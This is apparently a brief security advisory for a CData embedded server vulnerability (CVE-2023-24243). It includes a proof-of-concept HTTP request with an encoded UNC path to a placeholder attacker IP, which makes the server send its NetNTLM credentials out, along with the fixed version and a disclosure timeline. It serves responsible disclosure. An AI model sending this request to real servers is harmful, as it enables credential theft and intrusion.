Send http request like this to remote cdata server (windows):
GET /%255c%255c[ATTACKER IP]%255cC$%255cbb HTTP/1.1
Host: cdata.arc.ip
Server will connect to attacker's ip and send netntlm credentials. We have requested a CVE entry (CVE-2023-24243).
request:
recieve:
Update to latest version (currently V22.0.8473). vendor information: https://www.cdata.com/kb/entries/netembeddedserver-notice.rst
2022-10-03 vulnerability discovered during red team assessment 2023-03-09 vendor had informed 2023-03-14 vendor released fixed version 2023-06-13 vendor announcement